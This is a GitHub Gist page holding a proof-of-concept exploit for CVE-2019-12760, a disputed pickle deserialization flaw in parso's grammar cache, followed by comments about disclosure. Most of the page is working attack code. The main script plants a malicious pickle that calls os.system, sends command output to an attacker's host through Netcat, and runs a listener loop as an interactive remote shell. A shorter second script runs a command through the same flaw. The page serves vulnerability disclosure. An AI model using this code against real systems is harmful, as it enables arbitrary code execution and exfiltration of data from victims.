Skip to content

Instantly share code, notes, and snippets.

@dhondta
Last active February 16, 2022 08:13
Show Gist options
  • Save dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7 to your computer and use it in GitHub Desktop.
Save dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7 to your computer and use it in GitHub Desktop.
Proof-of-Concept for Python parso Cache Load Vulnerability (CVE-2019-12760)

Description

** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."

References

#!/usr/bin/python
import parso
import pickle
import random
import shutil
import threading
from hashlib import sha256
from os import makedirs, remove, system
from os.path import dirname, exists, join
from six import b, u
from subprocess import Popen, PIPE
from sys import version_info as v
from tinyscript import *
__author__ = "Alexandre D'Hondt"
__version__ = "1.0"
__copyright__ = "AGPLv3 (http://www.gnu.org/licenses/agpl.html)"
__doc__ = """
This Proof-of-Concept exploit leverages cache loading of the parso library.
It requires the attacker to be able to create a folder and to write files on
the target. It guesses the path to a cache file, writes an evil pickled object
to it and, while triggering grammar loading, makes the vulnerable application
load the evil pickle to allow Arbitrary Code Execution.
"""
# ------------------------- FUNCTIONS TO BE CUSTOMIZED -------------------------
def get_payload(command, lhost, lport):
    """Serialize the object that is planted in place of a grammar cache entry.

    The object's ``__reduce__`` makes unpickling call ``os.system`` with
    ``command`` piped into Netcat, which forwards the command's output to
    ``lhost:lport``.

    :param command: shell command whose output is wanted
    :param lhost:   address Netcat connects back to
    :param lport:   port Netcat connects back to
    :return:        the result of ``pickle.dumps`` on the crafted object
    """
    # TODO: implement here the logic to send remote command result to
    #       attacker's host (i.e. if Netcat is not present on the remote
    #       server)
    piped_command = "{} | nc -n {} {} -w 1".format(command, lhost, lport)

    class PoC(object):
        def __reduce__(self):
            # (callable, args) pair that pickle invokes when loading
            return (system, (piped_command, ))

    return pickle.dumps(PoC())
def remove_from_target(host, port, abspath):
    """Delete the file at ``abspath``.

    ``host`` and ``port`` are accepted but not used: this placeholder only
    removes the file from the local filesystem.

    :param host:    target address (unused here)
    :param port:    target port (unused here)
    :param abspath: path of the file to delete
    """
    # TODO: implement here the logic to remove a file from the remote server
    remove(abspath)
def trigger_grammar_processing(dummy_path, cache_path):
    """Ask parso to parse ``dummy_path`` with caching enabled.

    Any error raised by the parse is deliberately tolerated (the caller only
    needs the cache lookup to happen), but it is now logged at debug level
    rather than silently dropped.

    :param dummy_path: path of the file handed to ``Grammar.parse``
    :param cache_path: cache directory handed to ``Grammar.parse``
    """
    # TODO: implement here the logic to trigger grammar processing by parso on
    #       the remote server
    grammar = parso.load_grammar()
    try:
        grammar.parse(path=dummy_path, cache=True, cache_path=cache_path)
    except Exception as exc:
        # Best effort: keep going, but do not swallow KeyboardInterrupt or
        # SystemExit the way a bare ``except:`` would.
        logger.debug("> Grammar parsing raised: %r" % (exc, ))
def write_to_target(host, port, abspath, content=""):
    """Write ``content`` to ``abspath``, creating the parent folder if needed.

    ``host`` and ``port`` are accepted but not used: this placeholder only
    writes to the local filesystem.

    :param host:    target address (unused here)
    :param port:    target port (unused here)
    :param abspath: path of the file to write
    :param content: text or bytes to write; defaults to an empty file
    """
    # TODO: implement here the logic to write a file to the remote server
    folder = dirname(abspath)
    # dirname() returns "" for a bare filename and makedirs("") raises, so
    # only create the folder when there is one to create.
    if folder and not exists(folder):
        makedirs(folder)
    # six.b() encodes its argument on Python 3 and therefore only accepts
    # text; bytes (e.g. the output of pickle.dumps) are written unchanged.
    data = content if isinstance(content, bytes) else b(content)
    with open(abspath, 'wb') as f:
        f.write(data)
    logger.debug("> File written to '%s'" % abspath)
# ----------------------------- STATIC FUNCTIONS -------------------------------
class Listener(object):
    """Netcat listener loop meant to run in its own thread.

    ``run`` repeatedly picks a random port, publishes it in the global
    ``args.lport``, starts ``nc -nlvp <port>`` through the shell, waits for it
    to exit and prints what it wrote to stdout. The loop ends once ``state``
    has been set to 0, which is only checked between two Netcat runs.
    """

    def __init__(self):
        # 1 = keep listening, 0 = stop before starting the next listener
        self.state = 1
        # the thread is created here but started by the caller
        self.thread = threading.Thread(target=self.run)
        self.kwargs = {'stdout': PIPE, 'stderr': PIPE, 'shell': True}

    def run(self):
        """Run one Netcat listener after another until ``state`` is 0."""
        global args
        last_lport = args.lport = 0
        while True:
            if self.state == 0:
                break
            # never reuse the port of the listener that has just exited
            while args.lport == last_lport:
                args.lport = random.randint(12345, 45678)
            logger.debug("Starting new listener on port {}".format(args.lport))
            self.args = ("nc -nlvp {}".format(args.lport), )
            # blocks until this Netcat instance terminates
            out, _ = Popen(*self.args, **self.kwargs).communicate()
            try:
                print(out.decode('utf-8'))
            except UnicodeError:
                # output that is not valid UTF-8 (or cannot be encoded for
                # the terminal): fall back to its string representation
                print(u(str(out)))
            last_lport = args.lport
def cache_filepath(cache_path, python_implem, dummy_path, version):
    """Compute the path of the cache file associated with ``dummy_path``.

    The result has the form
    ``<cache_path>/<implem>-<version>-<pickle version>/<h>-<p>.pkl`` where
    ``<h>`` is the SHA-256 of the local parso grammar file for ``version`` and
    ``<p>`` is the SHA-256 of ``dummy_path``.

    :param cache_path:    cache directory
    :param python_implem: Python implementation name (e.g. "CPython")
    :param dummy_path:    path of the file that will be parsed
    :param version:       Python major and minor version digits (e.g. "36")
    :return:              the computed cache file path
    """
    # we take the hash from the grammar on the local host, thus assuming it is
    # the same as target's one given Python's version
    grammar_file = join(dirname(parso.__file__), "python",
                        "grammar%s.txt" % version)
    # read through a context manager so the file handle is closed promptly
    with open(grammar_file) as f:
        grammar_hash = sha256(f.read().encode("utf-8")).hexdigest()
    path_hash = sha256(dummy_path.encode("utf-8")).hexdigest()
    pickle_path = "%s/%s-%s-%i/%s-%s.pkl" % (
        cache_path, python_implem, version, parso.cache._PICKLE_VERSION,
        grammar_hash, path_hash)
    logger.debug("> Cache path: %s" % pickle_path)
    return pickle_path
def start_shell():
    """Run the interactive prompt loop of the proof-of-concept.

    Starts the Netcat listener thread, then for each command typed at the
    prompt: writes the payload to the computed cache path, triggers grammar
    processing and removes both the cache file and the dummy file. Typing
    "exit" or "quit" stops the listener, removes the cache folder and returns.
    """
    global args
    logger.debug("Starting shell...")
    rhost, rport, lhost = args.rhost, args.rport, args.lhost
    implem, pyver, rdir = args.implem, args.python, args.rdir
    listener = Listener()
    listener.thread.start()
    cnt = 0
    while True:
        # a fresh dummy file name per command gives a fresh cache file name
        dummy = join(rdir, "dummy{}".format(cnt))
        write_to_target(rhost, rport, dummy)
        cpath = cache_filepath(rdir, implem, dummy, pyver)
        try:
            cmd = raw_input("> ")
        except NameError:
            # Python 3 has no raw_input(). Only NameError is caught so that,
            # on Python 2, an EOF or Ctrl-C at the prompt does not fall
            # through to input(), which evaluates what is typed.
            cmd = input("> ")
        cmd = cmd.strip()
        if cmd == "":
            continue
        elif cmd in ["exit", "quit"]:
            listener.state = 0
            logger.debug("Killing Netcat instances...")
            Popen("killall -9 nc", shell=True)
            logger.debug("Joining Netcat thread...")
            listener.thread.join(1)
            logger.debug("Removing artifacts...")
            shutil.rmtree(args.rdir)
            return
        # args.lport is the port currently published by the listener thread
        write_to_target(rhost, rport, cpath,
                        get_payload(cmd, lhost, args.lport))
        trigger_grammar_processing(dummy, rdir)
        remove_from_target(rhost, rport, cpath)
        remove_from_target(rhost, rport, dummy)
        cnt += 1
# -------------------------- SCRIPT'S EXECUTABLE PART --------------------------
if __name__ == '__main__':
    # Command-line options. `parser` and `initialize` are not defined in this
    # file; presumably they come from the `tinyscript` star import, with
    # initialize() also providing the global `args` -- confirm against
    # tinyscript's documentation.
    target = parser.add_argument_group("Target options")
    target.add_argument("-d", "--cache-dir", dest="rdir", default="/tmp/parso",
                        help="cache absolute folder")
    target.add_argument("-i", "--implem", default="CPython",
                        choices=["CPython", "IronPython", "Jython", "PyPy"],
                        help="platform Python's implementation")
    # --rhost/--rport describe the target, not the local listener
    target.add_argument("--rhost", default="127.0.0.1",
                        help="remote host address")
    target.add_argument("--rport", default=80, type=int,
                        help="remote host port")
    target.add_argument("-p", "--python", default="36",
                        help="Python major and minor version digits")
    payload = parser.add_argument_group("Payload options")
    payload.add_argument("--lhost", default="127.0.0.1",
                         help="local host address")
    initialize()
    start_shell()
@iamleot
Copy link

iamleot commented Jun 7, 2019 via email

@dhondta
Copy link
Author

dhondta commented Jun 7, 2019

Have you then recontacted him before CVE-2019-12760 was published?

Not yet, as I'm busy with other matters. I published this as a Gist for the record, also because it has more or less timed out with regard to responsible disclosure, for what it's worth.

In any case I think it would be better to file a public issue upstream now that the problem is public. Can you please file it?

You're right, I will open an issue on the related GitHub repo soon.

@iamleot
Copy link

iamleot commented Jun 15, 2019

JFTR this was reported upstream via davidhalter/parso#75.

Thank you!

@dhondta
Copy link
Author

dhondta commented Jun 18, 2019

Simpler proof-of-concept script:

#!/usr/bin/python
import parso
import pickle
import sys
from hashlib import sha256
from os import makedirs, system
from os.path import dirname, exists, join
from six import b

__author__ = "Alexandre D'Hondt"

# Step 1: create the empty file that parso will be asked to parse.
print("\n1. Writing a dummy empty file...")
dummy = "/tmp/dummy"
with open(dummy, 'wb') as f:
    f.write(b(""))
print("   > %s" % dummy)

# Step 2: rebuild the cache file name from the running interpreter's version
# digits, parso's pickle version, the SHA-256 of the local grammar file and
# the SHA-256 of the dummy file's path.
print("\n2. Computing cache file's path...")
pyversion = "".join(sys.version.split(".")[:2])
grammar = join(dirname(parso.__file__), "python", "grammar%s.txt" % pyversion)
# read through a context manager so the grammar file handle is closed
with open(grammar) as f:
    grammar_hash = sha256(f.read().encode("utf-8")).hexdigest()
cache = "/tmp/parso/CPython-%s-%i/%s-%s.pkl" % (
    pyversion,
    parso.cache._PICKLE_VERSION,
    grammar_hash,
    sha256(dummy.encode("utf-8")).hexdigest()
)
print("   > %s" % cache)
d = dirname(cache)
if not exists(d):
    makedirs(d)

# Step 3: write a pickle whose loading calls os.system("ls").
print("\n3. Writing a evil cache file (with a pickle payload)...")
class PoC(object):
    def __reduce__(self):
        return (system, ("ls", ))
with open(cache, 'wb') as f:
    f.write(pickle.dumps(PoC()))
print("   > done")

# Step 4: parse the dummy file with caching enabled and the same cache folder.
print("\n4. Triggering grammar parsing...")
g = parso.load_grammar()
try:
    print("\nCommand's result:\n")
    g.parse(path=dummy, cache=True, cache_path="/tmp/parso")
except Exception:
    # Errors raised by the parse itself are deliberately ignored here.
    pass

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment